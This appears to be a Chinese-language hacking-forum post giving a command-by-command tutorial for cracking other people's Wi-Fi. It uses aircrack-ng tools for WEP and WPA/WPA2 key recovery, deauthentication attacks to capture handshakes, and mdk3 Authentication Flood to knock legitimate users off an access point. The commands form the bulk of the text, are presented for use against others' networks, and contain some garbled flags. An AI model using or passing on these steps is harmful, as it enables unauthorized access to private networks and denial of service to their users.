|
偽造目標ap,截取合法用戶數據包,分析獲得wifi密碼 灰鴿子官網
00x01 介紹
不管使用什么系統,一定要把網卡激活成為monitor模式,這樣軟件才可以識別
iwconfig //查看網卡
ifconfig start wlan0 //啟動wlan0網卡
airmon-ng start wlan0 //將網卡激活成monitor模式,一般為mon0
WEP
airodump-ng --ivs –w log –c頻道wlan0 //wep用ivs過濾報文即可,速度快
aireplay-ng -3 –b bssid –h clientMac mon0 //采用ARPRequesr來迅速加大數據量
aircrack-ng ivs文件 //破解捕獲來的ivs文件 wep用這幾個命令足以了
WPA/WPA2
airodump-ng –c頻道–w log mon0 //wpa正常抓包即可
aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 //發動Deauth攻擊獲取完整的handshake 提示獲取成功,即可破解抓來的數據包
aircrack-ng –w字典文件捕獲的cap文件 //WPA破解完全靠字典,需要有耐心
其實說到這里,hash破解速錄會大大提升,只是利用字典制作hash table的時候需要花好長的時間,但是破解是aircrack的幾十倍.
常見的幾種DOS攻擊:
Authentication Flood、Deauthentication Flood、Disassociation Flood、RF Jamming、Association Flood等
00x02 利用工具
本次我們還是依賴于BT5下一款強大的工具,mdk3
現在大部分無線下的工具都是利用mdk3為基本內核來開發的,所以其性能就不用多說了.
針對路由器,我們可以發動Authentication Flood,mdk3下參數為a,此攻擊是針對無線AP的洪水攻擊,
又叫做身份驗證攻擊.其原理就是向AP發動大量的虛假的鏈接請求,這種請求數量一旦超過了無線AP所能承受的范圍,
AP就會自動斷開現有鏈接,使合法用戶無法使用無線網絡
mdk3 mon0 a –a AP的MAC地址(BSSID)
2.jpg (74.49 KB, 下載次數: 658)
下載附件
黑客
2012-12-19 21:43 上傳
|
|